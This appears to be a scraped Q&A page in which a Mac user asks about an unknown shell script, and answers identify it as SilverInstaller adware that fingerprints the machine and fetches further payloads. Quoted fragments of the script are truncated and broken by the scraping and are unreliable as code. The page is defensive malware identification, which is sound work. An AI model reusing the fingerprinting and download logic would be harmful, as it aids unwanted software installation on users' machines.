What is this unknown executable on my boot volume? Is it Malicious?Is this possible to improve boot time?OS X renames secondary volume on bootWhat is wrong in this Perl regex in OSX?Disable Spotlight for Non-Current Boot VolumeLaunchd script to mount volume on bootopened malicious attachment from scam email- what to do?Is “Ignore ownership on this volume” reversible?What is this executable file named “Icon?” doing in my applications folder (and other folders)?What is this strange process `qemu` connecting to minergate.com?Dual Boot Created a New Volume

How to remove solidified paste from toothbrush

Car imitates dead battery but comes back to life ~30 minutes later and lets me start it

Would a warhorse allow its rider to approach a Dragon at all?

On Valentine's Day

UK visitors visa needed fast for badly injured family member

Should I present forged documents in a Penetration Test/Red team engagement?

Why can't we have only one complex eigenvalue?

Hot Rim Looking for Suggestions

What does "lequel" mean in this sentence, and how does the rest of its grammar operate?

Is it a mistake to use a password that has previously been used (by anyone ever)?

Is Segwit really safe and reduced?

Optimizing PostGIS query on table using buffered point

How would a medieval village protect themselves against dinosaurs?

Special case of filling between curves

GLPK: meaning of the "marginal' column in the solution output

Impulse response of a transfer function

"Store" a remote SSH session?

Patent Agreement in Order to Graduate

Seen from Europe, why is there a hard separation between Republicans and Democrats in the US?

There exists a prime p such that p | n for all n ∈ N, n > 1

Why would one use "enter the name of the project to confirm"?

How big could a meteor crater be without causing significant secondary effects?

Balancing empathy and deferring to the syllabus in teaching responsibilities

How can a bigfoot hide from satellites?



What is this unknown executable on my boot volume? Is it Malicious?


Is this possible to improve boot time?OS X renames secondary volume on bootWhat is wrong in this Perl regex in OSX?Disable Spotlight for Non-Current Boot VolumeLaunchd script to mount volume on bootopened malicious attachment from scam email- what to do?Is “Ignore ownership on this volume” reversible?What is this executable file named “Icon?” doing in my applications folder (and other folders)?What is this strange process `qemu` connecting to minergate.com?Dual Boot Created a New Volume






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty
margin-bottom:0;









20


















I noticed I had this file in the Macintosh HD folder.



enter image description here



And then when I click on it, it shows this:



enter image description here



Apparently this file was created in 2017, but I don't remember creating it.



Any idea what it could be?



Its content:



#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &









share|improve this question






















  • 31





    Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

    – Allan
    Sep 10 at 21:03






  • 3





    open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

    – Steve Chambers
    Sep 10 at 21:03






  • 2





    If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

    – Allan
    Sep 10 at 21:04






  • 2





    So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

    – Allan
    Sep 10 at 21:39






  • 8





    That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

    – André Borie
    Sep 11 at 10:54

















20


















I noticed I had this file in the Macintosh HD folder.



enter image description here



And then when I click on it, it shows this:



enter image description here



Apparently this file was created in 2017, but I don't remember creating it.



Any idea what it could be?



Its content:



#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &









share|improve this question






















  • 31





    Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

    – Allan
    Sep 10 at 21:03






  • 3





    open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

    – Steve Chambers
    Sep 10 at 21:03






  • 2





    If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

    – Allan
    Sep 10 at 21:04






  • 2





    So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

    – Allan
    Sep 10 at 21:39






  • 8





    That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

    – André Borie
    Sep 11 at 10:54













20













20









20


8






I noticed I had this file in the Macintosh HD folder.



enter image description here



And then when I click on it, it shows this:



enter image description here



Apparently this file was created in 2017, but I don't remember creating it.



Any idea what it could be?



Its content:



#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &









share|improve this question
















I noticed I had this file in the Macintosh HD folder.



enter image description here



And then when I click on it, it shows this:



enter image description here



Apparently this file was created in 2017, but I don't remember creating it.



Any idea what it could be?



Its content:



#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &






macos bash file malware






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Sep 11 at 18:10









ankii

3,8465 gold badges7 silver badges35 bronze badges




3,8465 gold badges7 silver badges35 bronze badges










asked Sep 10 at 20:52









Friendly SirenFriendly Siren

3111 silver badge4 bronze badges




3111 silver badge4 bronze badges










  • 31





    Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

    – Allan
    Sep 10 at 21:03






  • 3





    open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

    – Steve Chambers
    Sep 10 at 21:03






  • 2





    If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

    – Allan
    Sep 10 at 21:04






  • 2





    So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

    – Allan
    Sep 10 at 21:39






  • 8





    That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

    – André Borie
    Sep 11 at 10:54












  • 31





    Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

    – Allan
    Sep 10 at 21:03






  • 3





    open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

    – Steve Chambers
    Sep 10 at 21:03






  • 2





    If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

    – Allan
    Sep 10 at 21:04






  • 2





    So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

    – Allan
    Sep 10 at 21:39






  • 8





    That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

    – André Borie
    Sep 11 at 10:54







31




31





Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

– Allan
Sep 10 at 21:03





Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

– Allan
Sep 10 at 21:03




3




3





open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

– Steve Chambers
Sep 10 at 21:03





open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

– Steve Chambers
Sep 10 at 21:03




2




2





If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

– Allan
Sep 10 at 21:04





If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

– Allan
Sep 10 at 21:04




2




2





So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

– Allan
Sep 10 at 21:39





So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.

– Allan
Sep 10 at 21:39




8




8





That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

– André Borie
Sep 11 at 10:54





That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

– André Borie
Sep 11 at 10:54










2 Answers
2






active

oldest

votes


















42



















This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.







Installed software in this package likely includes




MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer




all of which you most certainly don't want.



  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code




#!/bin/bash



This code is script to be interpreted by bash, noted by this shebang.




func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')



Get a unique identifier for this machine to be used later.




COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &



Function all ready to go, time to call it.






share|improve this answer























  • 4





    This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00






  • 3





    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

    – Friendly Siren
    Sep 10 at 22:49






  • 1





    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11






  • 4





    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06






  • 2





    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54


















5



















That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.



  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step



  • https://www.malwarebytes.com/





share|improve this answer





















  • 3





    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03












  • @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51



















2 Answers
2






active

oldest

votes








2 Answers
2






active

oldest

votes









active

oldest

votes






active

oldest

votes









42



















This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.







Installed software in this package likely includes




MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer




all of which you most certainly don't want.



  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code




#!/bin/bash



This code is script to be interpreted by bash, noted by this shebang.




func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')



Get a unique identifier for this machine to be used later.




COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &



Function all ready to go, time to call it.






share|improve this answer























  • 4





    This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00






  • 3





    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

    – Friendly Siren
    Sep 10 at 22:49






  • 1





    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11






  • 4





    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06






  • 2





    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54















42



















This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.







Installed software in this package likely includes




MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer




all of which you most certainly don't want.



  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code




#!/bin/bash



This code is script to be interpreted by bash, noted by this shebang.




func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')



Get a unique identifier for this machine to be used later.




COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &



Function all ready to go, time to call it.






share|improve this answer























  • 4





    This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00






  • 3





    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

    – Friendly Siren
    Sep 10 at 22:49






  • 1





    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11






  • 4





    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06






  • 2





    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54













42















42











42









This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.







Installed software in this package likely includes




MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer




all of which you most certainly don't want.



  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code




#!/bin/bash



This code is script to be interpreted by bash, noted by this shebang.




func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')



Get a unique identifier for this machine to be used later.




COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &



Function all ready to go, time to call it.






share|improve this answer
















This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.







Installed software in this package likely includes




MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer




all of which you most certainly don't want.



  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code




#!/bin/bash



This code is script to be interpreted by bash, noted by this shebang.




func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')



Get a unique identifier for this machine to be used later.




COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &



Function all ready to go, time to call it.







share|improve this answer















share|improve this answer




share|improve this answer








edited Sep 10 at 22:19

























answered Sep 10 at 21:48









grggrg

148k25 gold badges238 silver badges351 bronze badges




148k25 gold badges238 silver badges351 bronze badges










  • 4





    This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00






  • 3





    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

    – Friendly Siren
    Sep 10 at 22:49






  • 1





    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11






  • 4





    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06






  • 2





    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54












  • 4





    This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00






  • 3





    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

    – Friendly Siren
    Sep 10 at 22:49






  • 1





    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11






  • 4





    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06






  • 2





    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54







4




4





This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

– ankii
Sep 10 at 22:00





This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com

– ankii
Sep 10 at 22:00




3




3





@grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

– Friendly Siren
Sep 10 at 22:49





@grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac

– Friendly Siren
Sep 10 at 22:49




1




1





@FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

– nohillside
Sep 11 at 13:11





@FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

– nohillside
Sep 11 at 13:11




4




4





It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

– Kevin
Sep 11 at 17:06





It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

– Kevin
Sep 11 at 17:06




2




2





The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

– Mark
Sep 11 at 19:54





The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

– Mark
Sep 11 at 19:54













5



















That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.



  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step



  • https://www.malwarebytes.com/





share|improve this answer





















  • 3





    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03












  • @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51















5



















That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.



  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step



  • https://www.malwarebytes.com/





share|improve this answer





















  • 3





    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03












  • @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51













5















5











5









That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.



  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step



  • https://www.malwarebytes.com/





share|improve this answer














That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.



  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step



  • https://www.malwarebytes.com/






share|improve this answer













share|improve this answer




share|improve this answer










answered Sep 10 at 21:35









bmikebmike

175k47 gold badges314 silver badges674 bronze badges




175k47 gold badges314 silver badges674 bronze badges










  • 3





    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03












  • @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51












  • 3





    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03












  • @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51







3




3





The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

– grg
Sep 10 at 21:03






The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

– grg
Sep 10 at 21:03














@bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

– Friendly Siren
Sep 10 at 22:51





@bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

– Friendly Siren
Sep 10 at 22:51



Popular posts from this blog

Tamil (spriik) Luke uk diar | Nawigatjuun

Align equal signs while including text over equalitiesAMS align: left aligned text/math plus multicolumn alignmentMultiple alignmentsAligning equations in multiple placesNumbering and aligning an equation with multiple columnsHow to align one equation with another multline equationUsing \ in environments inside the begintabularxNumber equations and preserving alignment of equal signsHow can I align equations to the left and to the right?Double equation alignment problem within align enviromentAligned within align: Why are they right-aligned?

Training a classifier when some of the features are unknownWhy does Gradient Boosting regression predict negative values when there are no negative y-values in my training set?How to improve an existing (trained) classifier?What is effect when I set up some self defined predisctor variables?Why Matlab neural network classification returns decimal values on prediction dataset?Fitting and transforming text data in training, testing, and validation setsHow to quantify the performance of the classifier (multi-class SVM) using the test data?How do I control for some patients providing multiple samples in my training data?Training and Test setTraining a convolutional neural network for image denoising in MatlabShouldn't an autoencoder with #(neurons in hidden layer) = #(neurons in input layer) be “perfect”?